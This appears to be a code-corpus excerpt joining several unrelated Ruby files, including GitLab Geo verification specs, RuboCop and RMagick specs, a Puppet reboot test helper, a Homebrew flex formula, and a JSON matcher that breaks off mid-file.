describe '.model_record_id_batch_to_verify' do
let(:pending_ids) { [1, 2] }
before do
allow(described_class).to receive(:verification_batch_size).and_return(verification_batch_size)
allow(described_class).to receive(:verification_pending_batch).with(batch_size: verification_batch_size).and_return(pending_ids)
end
context 'when the batch is filled by pending rows' do
let(:verification_batch_size) { 2 }
it 'returns IDs of pending rows' do
expect(described_class.model_record_id_batch_to_verify).to eq(pending_ids)
end
it 'does not call .verification_failed_batch' do
expect(described_class).not_to receive(:verification_failed_batch)
described_class.model_record_id_batch_to_verify
end
end
context 'when that batch is not filled by pending rows' do
let(:failed_ids) { [3, 4, 5] }
let(:verification_batch_size) { 5 }
it 'includes IDs of failed rows' do
remaining_capacity = verification_batch_size - pending_ids.size
allow(described_class).to receive(:verification_failed_batch).with(batch_size: remaining_capacity).and_return(failed_ids)
result = described_class.model_record_id_batch_to_verify
expect(result).to include(*pending_ids)
expect(result).to include(*failed_ids)
end
end
end
describe '.verification_pending_batch' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:verification_pending_batch)
described_class.verification_pending_batch
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:verification_pending_batch)
described_class.verification_pending_batch
end
end
end
describe '.verification_failed_batch' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:verification_failed_batch)
described_class.verification_failed_batch
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:verification_failed_batch)
described_class.verification_failed_batch
end
end
end
describe '.fail_verification_timeouts' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:fail_verification_timeouts)
described_class.fail_verification_timeouts
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:fail_verification_timeouts)
described_class.fail_verification_timeouts
end
end
end
describe '#after_verifiable_update' do
it 'calls verify_async if needed' do
allow(described_class).to receive(:verification_enabled?).and_return(true)
allow(replicator).to receive(:primary_checksum).and_return(nil)
allow(replicator).to receive(:checksummable?).and_return(true)
expect(replicator).to receive(:verify_async)
replicator.after_verifiable_update
end
end
describe '#verify_async' do
before do
model_record.save!
end
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'calls verification_started! and enqueues VerificationWorker' do
expect(model_record).to receive(:verification_started!)
expect(Geo::VerificationWorker).to receive(:perform_async).with(replicator.replicable_name, model_record.id)
replicator.verify_async
end
end
end
describe '#verify' do
it 'wraps the checksum calculation in track_checksum_attempt!' do
tracker = double('tracker')
allow(replicator).to receive(:verification_state_tracker).and_return(tracker)
allow(replicator).to receive(:calculate_checksum).and_return('abc123')
expect(tracker).to receive(:track_checksum_attempt!).and_yield
replicator.verify
end
end
describe '#verification_state_tracker' do
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'returns model_record' do
expect(replicator.verification_state_tracker).to eq(model_record)
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
it 'returns registry' do
registry = double('registry')
allow(replicator).to receive(:registry).and_return(registry)
expect(replicator.verification_state_tracker).to eq(registry)
end
end
end
describe '#handle_after_checksum_succeeded' do
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'creates checksum_succeeded event' do
expect { replicator.handle_after_checksum_succeeded }.to change { ::Geo::Event.count }.by(1)
expect(::Geo::Event.last.event_name).to eq 'checksum_succeeded'
end
it 'is called on verification success' do
model_record.verification_started
expect { model_record.verification_succeeded_with_checksum!('abc123', Time.current) }.to change { ::Geo::Event.count }.by(1)
expect(::Geo::Event.last.event_name).to eq 'checksum_succeeded'
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
it 'does not create an event' do
expect { replicator.handle_after_checksum_succeeded }.not_to change { ::Geo::Event.count }
end
end
end
describe '#consume_event_checksum_succeeded' do
context 'with a persisted model_record' do
before do
model_record.save!
end
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'does nothing' do
expect(replicator).not_to receive(:registry)
replicator.consume_event_checksum_succeeded
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
context 'with a persisted registry' do
let(:registry) { replicator.registry }
before do
registry.save!
end
context 'with a registry which is verified' do
it 'sets state to verification_pending' do
registry.verification_started
registry.verification_succeeded_with_checksum!('foo', Time.current)
expect do
replicator.consume_event_checksum_succeeded
end.to change { registry.reload.verification_state }
.from(verification_state_value(:verification_succeeded))
.to(verification_state_value(:verification_pending))
end
end
context 'with a registry which is pending verification' do
it 'does not change state from verification_pending' do
registry.save!
expect do
replicator.consume_event_checksum_succeeded
end.not_to change { registry.reload.verification_state }
.from(verification_state_value(:verification_pending))
end
end
end
context 'with an unpersisted registry' do
it 'does not persist the registry' do
replicator.consume_event_checksum_succeeded
expect(replicator.registry.persisted?).to be_falsey
end
end
end
end
end
context 'integration tests' do
before do
model_record.save!
end
context 'on a primary' do
before do
stub_primary_node
end
describe 'background backfill' do
it 'verifies model records' do
expect do
Geo::VerificationBatchWorker.new.perform(replicator.replicable_name)
end.to change { model_record.reload.verification_succeeded? }.from(false).to(true)
end
end
describe 'triggered by events' do
it 'verifies model records' do
expect do
Geo::VerificationWorker.new.perform(replicator.replicable_name, replicator.model_record_id)
end.to change { model_record.reload.verification_succeeded? }.from(false).to(true)
end
end
end
context 'on a secondary' do
before do
stub_secondary_node
end
describe 'background backfill' do
it 'verifies registries' do
registry = replicator.registry
registry.start
registry.synced!
expect do
Geo::VerificationBatchWorker.new.perform(replicator.replicable_name)
end.to change { registry.reload.verification_succeeded? }.from(false).to(true)
end
end
describe 'triggered by events' do
it 'verifies registries' do
registry = replicator.registry
registry.save!
expect do
Geo::VerificationWorker.new.perform(replicator.replicable_name, replicator.model_record_id)
end.to change { registry.reload.verification_succeeded? }.from(false).to(true)
end
end
end
end
def verification_state_value(state_name)
model_record.class.verification_state_value(state_name)
end
end
| 30.552817 | 134 | 0.697188 |
61a70b830dd23c744bb8af3e07bfa4b2b7b2d486 | 457 | control 'verify the settings of all Azure Power BI Dataflows' do
impact 1.0
title 'Testing the singular resource of azure_power_bi_dataflow.'
desc 'Testing the singular resource of azure_power_bi_dataflow.'
describe azure_power_bi_dataflow(group_id: 'f089354e-8366-4e18-aea3-4cb4a3a50b48') do
it { should exist }
its('objectId') { should eq 'bd32e5c0-363f-430b-a03b-5535a4804b9b' }
its('name') { should eq 'AdventureWorks' }
end
end
| 35.153846 | 87 | 0.750547 |
e8ec490baf491f8124ed7caaad148822fef43fa9 | 379 | require "vcr"
VCR.configure do |config|
config.allow_http_connections_when_no_cassette = true
config.cassette_library_dir = "spec/vcr"
config.hook_into :webmock
config.ignore_localhost = true
config.configure_rspec_metadata!
config.default_cassette_options = { match_requests_on: [:method, :host], record: :new_episodes }
config.ignore_hosts "codeclimate.com"
end
| 31.583333 | 98 | 0.791557 |
bfa7890b2f302246f2252bf0479f02ddf5aeb8a7 | 3,045 | module Elasticsearch
module API
module Indices
module Actions
# Return the result of the analysis process (tokens)
#
# Allows to "test-drive" the Elasticsearch analysis process by performing the analysis on the
# same text with different analyzers. An ad-hoc analysis chain can be built from specific
# _tokenizer_ and _filters_.
#
# @example Analyze text "Quick Brown Jumping Fox" with the _snowball_ analyzer
#
# client.indices.analyze text: 'The Quick Brown Jumping Fox', analyzer: 'snowball'
#
# @example Analyze text "Quick Brown Jumping Fox" with a custom tokenizer and filter chain
#
# client.indices.analyze body: 'The Quick Brown Jumping Fox',
# tokenizer: 'whitespace',
# filters: ['lowercase','stop']
#
# @note If your text for analysis is longer than 4096 bytes then you should use the :body argument, rather than :text, to avoid HTTP transport errors
#
# @option arguments [String] :index The name of the index to scope the operation
# @option arguments [String] :body The text on which the analysis should be performed
# @option arguments [String] :analyzer The name of the analyzer to use
# @option arguments [String] :field Use the analyzer configured for this field
# (instead of passing the analyzer name)
# @option arguments [List] :filters A comma-separated list of filters to use for the analysis
# @option arguments [String] :index The name of the index to scope the operation
# @option arguments [Boolean] :prefer_local With `true`, specify that a local shard should be used if available,
# with `false`, use a random shard (default: true)
# @option arguments [String] :text The text on which the analysis should be performed
# (when request body is not used)
# @option arguments [String] :tokenizer The name of the tokenizer to use for the analysis
# @option arguments [String] :format Format of the output (options: detailed, text)
#
# @see http://www.elasticsearch.org/guide/reference/api/admin-indices-analyze/
#
def analyze(arguments={})
valid_params = [
:analyzer,
:field,
:filters,
:index,
:prefer_local,
:text,
:tokenizer,
:format ]
method = HTTP_GET
path = Utils.__pathify Utils.__listify(arguments[:index]), '_analyze'
params = Utils.__validate_and_extract_params arguments, valid_params
params[:filters] = Utils.__listify(params[:filters]) if params[:filters]
body = arguments[:body]
perform_request(method, path, params, body).body
end
end
end
end
end
| 46.846154 | 157 | 0.600328 |
1c2c80bb87f54b24112d00ec1087fa837b5abbb0 | 353 | RSpec.describe Magick::Pixel, '#alpha' do
it 'works' do
pixel = described_class.from_color('brown')
expect { pixel.alpha = 123 }.not_to raise_error
expect(pixel.alpha).to eq(123)
expect { pixel.alpha = 255.25 }.not_to raise_error
expect(pixel.alpha).to eq(255)
expect { pixel.alpha = 'x' }.to raise_error(TypeError)
end
end
| 29.416667 | 58 | 0.679887 |
911662c92336156a6afda537468c0727ae894a92 | 10,591 | # encoding: utf-8
require 'spec_helper'
describe RuboCop::Cop::Style::SpaceInsideBlockBraces do
SUPPORTED_STYLES = %w(space no_space)
subject(:cop) { described_class.new(config) }
let(:config) do
merged = RuboCop::ConfigLoader
.default_configuration['Style/SpaceInsideBlockBraces']
.merge(cop_config)
RuboCop::Config.new('Style/Blocks' => { 'Enabled' => false },
'Style/SpaceInsideBlockBraces' => merged)
end
let(:cop_config) do
{
'EnforcedStyle' => 'space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => true
}
end
context 'with space inside empty braces not allowed' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'no_space' } }
it 'accepts empty braces with no space inside' do
inspect_source(cop, 'each {}')
expect(cop.messages).to be_empty
end
it 'accepts empty braces with line break inside' do
inspect_source(cop, [' each {',
' }'])
expect(cop.messages).to be_empty
end
it 'accepts empty braces with comment and line break inside' do
inspect_source(cop, [' each { # Comment',
' }'])
expect(cop.messages).to be_empty
end
it 'registers an offense for empty braces with space inside' do
inspect_source(cop, 'each { }')
expect(cop.messages).to eq(['Space inside empty braces detected.'])
expect(cop.highlights).to eq([' '])
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { }')
expect(new_source).to eq('each {}')
end
it 'does not auto-correct when braces are not empty' do
old_source = <<-END
a {
b
}
END
new_source = autocorrect_source(cop, old_source)
expect(new_source).to eq(old_source)
end
end
context 'with space inside empty braces allowed' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'space' } }
it 'accepts empty braces with space inside' do
inspect_source(cop, 'each { }')
expect(cop.messages).to be_empty
end
it 'registers an offense for empty braces with no space inside' do
inspect_source(cop, 'each {}')
expect(cop.messages).to eq(['Space missing inside empty braces.'])
expect(cop.highlights).to eq(['{}'])
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {}')
expect(new_source).to eq('each { }')
end
end
context 'with invalid value for EnforcedStyleForEmptyBraces' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'unknown' } }
it 'fails with an error' do
expect { inspect_source(cop, 'each { }') }
.to raise_error('Unknown EnforcedStyleForEmptyBraces selected!')
end
end
it 'accepts braces surrounded by spaces' do
inspect_source(cop, 'each { puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'accepts left brace without outer space' do
inspect_source(cop, 'each{ puts }')
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {puts }')
expect(cop.messages).to eq(['Space missing inside {.'])
expect(cop.highlights).to eq(['p'])
end
it 'registers an offense for right brace without inner space' do
inspect_source(cop, 'each { puts}')
expect(cop.messages).to eq(['Space missing inside }.'])
expect(cop.highlights).to eq(['}'])
expect(cop.config_to_allow_offenses).to eq('Enabled' => false)
end
it 'registers offenses for both braces without inner space' do
inspect_source(cop, ['a {}',
'b { }',
'each {puts}'])
expect(cop.messages).to eq(['Space inside empty braces detected.',
'Space missing inside {.',
'Space missing inside }.'])
expect(cop.highlights).to eq([' ', 'p', '}'])
# Both correct and incorrect code has been found in relation to
# EnforcedStyleForEmptyBraces, but that doesn't matter. EnforcedStyle can
# be changed to get rid of the EnforcedStyle offenses.
expect(cop.config_to_allow_offenses).to eq('EnforcedStyle' =>
'no_space')
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {puts}')
expect(new_source).to eq('each { puts }')
end
context 'with passed in parameters' do
it 'accepts left brace with inner space' do
inspect_source(cop, 'each { |x| puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {|x| puts }')
expect(cop.messages).to eq(['Space between { and | missing.'])
expect(cop.highlights).to eq(['{|'])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) { x }')
expect(cop.messages).to be_empty
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {|x| puts }')
expect(new_source).to eq('each { |x| puts }')
end
context 'and Blocks cop enabled' do
let(:config) do
RuboCop::Config.new('Style/Blocks' => { 'Enabled' => true },
'Style/SpaceInsideBlockBraces' => cop_config)
end
it 'does auto-correction for single-line blocks' do
new_source = autocorrect_source(cop, 'each {|x| puts}')
expect(new_source).to eq('each { |x| puts }')
end
it 'does not do auto-correction for multi-line blocks' do
# {} will be changed to do..end by the Blocks cop, and then this cop is
# not relevant anymore.
old_source = ['each {|x|',
' puts',
'}']
new_source = autocorrect_source(cop, old_source)
expect(new_source).to eq(old_source.join("\n"))
end
end
context 'and space before block parameters not allowed' do
let(:cop_config) do
{
'EnforcedStyle' => 'space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => false
}
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { |x| puts }')
expect(cop.messages).to eq(['Space between { and | detected.'])
expect(cop.highlights).to eq([' '])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) { x }')
expect(cop.messages).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { |x| puts }')
expect(new_source).to eq('each {|x| puts }')
end
it 'accepts left brace without inner space' do
inspect_source(cop, 'each {|x| puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
end
end
context 'configured with no_space' do
let(:cop_config) do
{
'EnforcedStyle' => 'no_space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => true
}
end
it 'accepts braces without spaces inside' do
inspect_source(cop, 'each {puts}')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { puts}')
expect(cop.messages).to eq(['Space inside { detected.'])
expect(cop.highlights).to eq([' '])
expect(cop.config_to_allow_offenses).to eq('Enabled' => false)
end
it 'registers an offense for right brace with inner space' do
inspect_source(cop, 'each {puts }')
expect(cop.messages).to eq(['Space inside } detected.'])
expect(cop.highlights).to eq([' '])
end
it 'registers offenses for both braces with inner space' do
inspect_source(cop, 'each { puts }')
expect(cop.messages).to eq(['Space inside { detected.',
'Space inside } detected.'])
expect(cop.highlights).to eq([' ', ' '])
expect(cop.config_to_allow_offenses).to eq('EnforcedStyle' =>
'space')
end
it 'accepts left brace without outer space' do
inspect_source(cop, 'each {puts}')
expect(cop.highlights).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each{ puts }')
expect(new_source).to eq('each{puts}')
end
context 'with passed in parameters' do
context 'and space before block parameters allowed' do
it 'accepts left brace with inner space' do
inspect_source(cop, 'each { |x| puts}')
expect(cop.messages).to eq([])
expect(cop.highlights).to eq([])
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {|x| puts}')
expect(cop.messages).to eq(['Space between { and | missing.'])
expect(cop.highlights).to eq(['{|'])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) {x}')
expect(cop.messages).to be_empty
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {|x| puts}')
expect(new_source).to eq('each { |x| puts}')
end
end
context 'and space before block parameters not allowed' do
let(:cop_config) do
{
'EnforcedStyle' => 'no_space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => false
}
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { |x| puts}')
expect(cop.messages).to eq(['Space between { and | detected.'])
expect(cop.highlights).to eq([' '])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) {x}')
expect(cop.messages).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { |x| puts}')
expect(new_source).to eq('each {|x| puts}')
end
end
end
end
end
| 33.305031 | 79 | 0.598055 |
26b5e5d1daa954da0538580d0f08fa0c8b84eb2e | 4,317 | require 'beaker-task_helper/inventory'
require 'bolt_spec/run'
require 'beaker-pe'
require 'beaker-puppet'
require 'beaker-rspec'
require 'beaker/puppet_install_helper'
require 'beaker/module_install_helper'
require 'beaker/testmode_switcher'
require 'beaker/testmode_switcher/dsl'
run_puppet_install_helper
configure_type_defaults_on(hosts)
install_module_dependencies_on(hosts)
proj_root = File.expand_path(File.join(File.dirname(__FILE__), '..'))
staging = { module_name: 'puppetlabs-reboot' }
local = { module_name: 'reboot', source: proj_root }
hosts.each do |host|
# Install Reboot Module Dependencies
on(host, puppet('module install puppetlabs-stdlib'))
on(host, puppet('module install puppetlabs-registry'))
# Install Reboot Module
# in CI allow install from staging forge, otherwise from local
install_dev_puppet_module_on(host, options[:forge_host] ? staging : local)
end
base_dir = File.dirname(File.expand_path(__FILE__))
RSpec.configure do |c|
# Skip tasks tests unless Bolt is available
c.filter_run_excluding(bolt: true) unless ENV['GEM_BOLT']
# Make modules available locally for Bolt
c.add_setting :module_path
c.module_path = File.join(base_dir, 'fixtures', 'modules')
end
require 'rubygems' # this is necessary for ruby 1.8
require 'puppet/version'
WINDOWS_SHUTDOWN_ABORT = 'cmd /c shutdown /a'.freeze
# Some versions of Ruby and Puppet improperly report exit codes:
# due to a Ruby bug, the correct error code 1116 is returned modulo 256 = 92.
WINDOWS_SHUTDOWN_NOT_IN_PROGRESS = [1116, 1116 % 256].freeze
def shutdown_pid(agent)
# code to get ps command taken from Facter 2.x implementation
# as Facter 3.x is dropping the ps fact
ps = case fact_on(agent, 'operatingsystem')
when 'OpenWrt'
'ps www'
when 'FreeBSD', 'NetBSD', 'OpenBSD', 'Darwin', 'DragonFly'
'ps auxwww'
else
'ps -ef'
end
# code to isolate PID adapted from Puppet service base provider
on(agent, ps).stdout.each_line do |line|
if line =~ %r{shutdown}
return line.sub(%r{^\s+}, '').split(%r{\s+})[1]
end
end
nil
end
def ensure_shutdown_not_scheduled(agent)
sleep 5
if windows_agents.include?(agent)
on agent, WINDOWS_SHUTDOWN_ABORT, acceptable_exit_codes: WINDOWS_SHUTDOWN_NOT_IN_PROGRESS
else
pid = shutdown_pid(agent)
if pid
on(agent, "kill #{pid}", acceptable_exit_codes: [0])
raise CommandFailure, "Host '#{agent}' had unexpected scheduled shutdown with PID #{pid}."
end
end
end
# If the test is run on Debian 9 it does not seem possible to catch the shutdown command.
# As such, code has been added so that the loss of connection is caught instead.
def retry_shutdown_abort(agent, max_retries = 6)
sleep 55 if (fact('operatingsystem') =~ %r{SLES} && (fact('operatingsystemrelease') =~ %r{^15\.}))
i = 0
while i < max_retries
if windows_agents.include?(agent)
result = on(agent, WINDOWS_SHUTDOWN_ABORT, acceptable_exit_codes: [0, WINDOWS_SHUTDOWN_NOT_IN_PROGRESS].flatten)
    elsif (fact('operatingsystem') =~ %r{RedHat} && fact('operatingsystemrelease') =~ %r{^8\.}) || # rubocop:disable Metrics/BlockNesting
          (fact('operatingsystem') =~ %r{Debian} && (fact('operatingsystemrelease') =~ %r{^9\.} || fact('operatingsystemrelease') =~ %r{^10\.})) ||
          (fact('operatingsystem') =~ %r{Ubuntu} && (fact('operatingsystemrelease') =~ %r{^16\.} || fact('operatingsystemrelease') =~ %r{^18\.}))
      result = on(agent, "shutdown -c", acceptable_exit_codes: [0])
else
begin
pid = shutdown_pid(agent)
result = on(agent, "kill #{pid}", acceptable_exit_codes: [0]) if pid
rescue Beaker::Host::CommandFailure
break if (fact('operatingsystem') =~ %r{SLES} && (fact('operatingsystemrelease') =~ %r{^15\.}))
raise
end
end
break if result.exit_code == 0
warn("Reboot is not yet scheduled; sleeping for #{1 << i} seconds")
sleep 1 << i
i += 1
end
fail_test "Failed to abort shutdown on #{agent}" if i == max_retries
end
def windows_agents
agents.select { |agent| agent['platform'].include?('windows') }
end
def posix_agents
agents.reject { |agent| agent['platform'].include?('windows') }
end
def linux_agents
agents.select { |agent| fact_on(agent, 'kernel') == 'Linux' }
end
| 34.814516 | 145 | 0.699792 |
260b923a4adac556146d15ce53d81a49982f9d3a | 3,345 | require_relative '../../../test_helper'
require 'minitest/mock'
module Geminabox
module Proxy
class CopierTest < Minitest::Test
def setup
clean_data_dir
end
def test_remote_content_failure
raise_stub = proc { puts caller.join("\n") ; raise }
copier.stub :remote_content, raise_stub do
begin
copier.get_remote
rescue
end
assert(!File.exists?(copier.proxy_path), "Cached file should not exist")
end
end
def test_with_no_files_in_place
assert_equal false, copier.local_file_exists?
assert_equal false, copier.proxy_file_exists?
end
def test_with_local_in_place
create_local
assert_equal true, copier.local_file_exists?
assert_equal false, copier.proxy_file_exists?
end
def test_with_proxy_in_place
create_proxy
assert_equal false, copier.local_file_exists?
assert_equal true, copier.proxy_file_exists?
end
def test_copy_from_local
create_local
Copier.copy(test_file)
assert_proxy_file_present
assert_equal local_content, proxy_file_content
end
def test_copy_with_proxy_and_local
create_local
create_proxy
Copier.copy(test_file)
assert_equal proxy_content, proxy_file_content
end
def test_copy_with_just_proxy
create_proxy
Copier.copy(test_file)
assert_equal proxy_content, proxy_file_content
end
def test_copy_with_neither_local_nor_proxy
create_remote
Copier.copy(test_file)
assert_proxy_file_present
assert_equal remote_content, proxy_file_content
end
def test_copy_with_sub_directory
@test_file = 'sub_directory/co-pier_test.txt'
test_with_local_in_place
end
private
def copier
@copier ||= Copier.new(test_file)
end
def create_local_file
File.open(file_path(locator.local_path), 'w'){|f| f.write(new_content)}
end
def file_path(path)
File.expand_path(test_file, path)
end
def test_file
@test_file ||= 'copier_test.txt'
end
def locator
@locator ||= FileHandler.new test_file
end
def local_content
@local_content ||= this_is_a :local
end
def proxy_content
@proxy_content ||= this_is_a :proxy
end
def remote_content
@remote_content ||= this_is_a :remote
end
def this_is_a(type)
"This is a #{type} file"
end
def create_local
locator.local_path
File.open(locator.local_path, 'w+'){|f| f.write(local_content)}
end
def create_proxy
File.open(locator.proxy_path, 'w+'){|f| f.write(proxy_content)}
end
def create_remote
stub_request_for_remote
end
def stub_request_for_remote
stub_request(:get, "http://rubygems.org/#{test_file}").
to_return(:status => 200, :body => remote_content)
end
def proxy_file_content
File.read(locator.proxy_path)
end
def assert_proxy_file_present
assert copier.proxy_file_exists?, "#{locator.proxy_folder_name}/#{test_file} should be present"
end
end
end
end
| 24.23913 | 103 | 0.64006 |
f855de3282cc037dd8de3f460b5fdcf091e1e668 | 5,131 | # encoding: utf-8
require "spec_helper"
require "fileutils"
require "tempfile"
module Bunch
describe FileCache do
let(:input_1) { FileTree.from_hash("a" => "1", "b" => "2") }
let(:input_2) { FileTree.from_hash("a" => "1", "b" => "3") }
let(:result_1) { FileTree.from_hash("a" => "!", "b" => "@") }
let(:result_2) { FileTree.from_hash("a" => "!", "b" => "#") }
let(:result_3) { FileTree.from_hash("a" => "%", "b" => "#") }
let(:processor_1) { stub new: stub(result: result_1), to_s: "processor" }
let(:processor_2) { stub new: stub(result: result_2), to_s: "processor" }
let(:processor_3) { stub new: stub(result: result_3), to_s: "processor" }
let(:processor_4) { stub new: stub(result: result_3), to_s: "grocessor" }
def new_cache(processor, path = "a_path")
FileCache.new(processor, path)
end
before do
FileUtils.rm_rf ".bunch-cache"
end
it "delegates to the underlying processor on a cold cache" do
new_cache(processor_1).new(input_1).result.must_equal result_1
end
it "returns the same results for the same input" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_1).result.must_equal result_1
end
it "returns different results for a different input" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_2).result.must_equal result_2
end
it "only updates paths that have changed" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_3).new(input_2).result.must_equal result_2
end
it "maintains distinct caches for different processors" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_4).new(input_1).result.must_equal result_3
end
it "maintains distinct caches for different input paths" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_1).result.must_equal result_1
new_cache(processor_2, "abc").new(input_1).result.must_equal result_2
end
it "considers the cache expired if Bunch's version changes" do
new_cache(processor_1).new(input_1).result.must_equal result_1
begin
FileCache::VERSION = "alsdkjalskdj"
new_cache(processor_2).new(input_1).result.must_equal result_2
ensure
FileCache.send :remove_const, :VERSION
end
end
end
class FileCache
describe Partition do
let(:empty) { FileTree.from_hash({}) }
let(:tree_1) { FileTree.from_hash("a" => {"b" => "1", "c" => "2"}) }
it "returns input tree for pending if cache is empty" do
cache = stub
cache.stubs(:read).returns(nil)
partition = Partition.new(tree_1, cache)
partition.process!
partition.cached.must_equal empty
partition.pending.must_equal tree_1
end
it "divides input tree into pending and cached" do
cache = stub
cache.stubs(:read).with("a/b", "1").returns("cache")
cache.stubs(:read).with("a/c", "2").returns(nil)
partition = Partition.new(tree_1, cache)
partition.process!
partition.cached.must_equal FileTree.from_hash("a" => {"b" => "cache"})
partition.pending.must_equal FileTree.from_hash("a" => {"c" => "2"})
end
end
describe Cache do
def create_cache
Cache.from_trees(
FileTree.from_hash("a" => "1", "b" => { "c" => "2" }),
FileTree.from_hash("a" => "!", "b" => { "c" => "@" }))
end
def assert_cache_is_correct(cache)
cache.read("a", "1").must_equal "!"
cache.read("a", "2").must_equal nil
cache.read("b/c", "2").must_equal "@"
cache.read("b/c/d", "2").must_equal nil
cache.read("b/d", "2").must_equal nil
end
it "records a mapping between two trees" do
cache = create_cache
assert_cache_is_correct cache
end
it "saves to and loads from a file" do
original_cache = create_cache
loaded_cache = nil
Tempfile.open(["cache", ".yml"]) do |tempfile|
tempfile.close
original_cache.write_to_file(tempfile.path)
loaded_cache = Cache.read_from_file(tempfile.path)
end
assert_cache_is_correct loaded_cache
end
it "returns a null cache if the file can't be opened" do
Cache.read_from_file("asldkasd").must_be_instance_of Cache
end
describe "#read" do
before do
@cache = Cache.new(
{ "a" => Digest::MD5.hexdigest("1") },
FileTree.from_hash("a" => "!@#")
)
end
it "returns the result if the hash matches" do
@cache.read("a", "1").must_equal "!@#"
end
it "returns nil if the hash doesn't match" do
@cache.read("a", "2").must_equal nil
end
it "returns nil if the file isn't present" do
@cache.read("b", "1").must_equal nil
end
end
end
end
end
| 33.756579 | 79 | 0.620737 |
f75f997df9c62653c53f8cfd33941513d30c21a9 | 2,145 | class Flex < Formula
desc "Fast Lexical Analyzer, generates Scanners (tokenizers)"
homepage "https://github.com/westes/flex"
url "https://github.com/westes/flex/releases/download/v2.6.4/flex-2.6.4.tar.gz"
sha256 "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c45ee995"
revision 1
bottle do
sha256 "902e2701bb4d8130fe3177211dda84b6ebc6a520467874a52bcd7ff043b949cc" => :catalina
sha256 "2051ed8f0de322732b111f2cc82069e82f6dfd4d839e6d098bbebcd7f92220e6" => :mojave
sha256 "9c224c27a3d40a53b6f778a6b825f8b4f14654080b144e50f1bec9cc608c757d" => :high_sierra
sha256 "a958106ee0895b21c7577478b847ecdbc601ce6a723543c5da455bfe0eee5f8f" => :sierra
sha256 "d96d0062e78529ae5a0ff049eeaf1216df4a5e47f2fbda680473b48b15f59d1a" => :x86_64_linux
end
head do
url "https://github.com/westes/flex.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
# https://github.com/westes/flex/issues/294
depends_on "gnu-sed" => :build
depends_on "libtool" => :build
end
keg_only :provided_by_macos, "some formulae require a newer version of flex"
depends_on "help2man" => :build
depends_on "gettext"
unless OS.mac?
depends_on "m4"
depends_on "bison" => :build
end
def install
if build.head?
ENV.prepend_path "PATH", Formula["gnu-sed"].opt_libexec/"gnubin"
system "./autogen.sh"
end
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-shared",
"--prefix=#{prefix}"
system "make", "install"
bin.install_symlink "flex" => "lex" unless OS.mac?
end
test do
(testpath/"test.flex").write <<~EOS
CHAR [a-z][A-Z]
%%
{CHAR}+ printf("%s", yytext);
[ \\t\\n]+ printf("\\n");
%%
int main()
{
yyin = stdin;
yylex();
}
EOS
system "#{bin}/flex", "test.flex"
system ENV.cc, "lex.yy.c", "-L#{lib}", "-lfl", "-o", "test"
assert_equal shell_output("echo \"Hello World\" | ./test"), <<~EOS
Hello
World
EOS
end
end
| 29.383562 | 94 | 0.642424 |
ed29909b90008da63ac76fedd9d7a8abf0d65d2b | 3,243 | # frozen_string_literal: true
require 'json'
module Saharspec
module Matchers
# @private
class BeJson
include RSpec::Matchers::Composable
include RSpec::Matchers # to have #match
ANY = Object.new.freeze
attr_reader :actual, :expected
def initialize(expected, **parse_opts)
@expected_matcher = @expected = expected
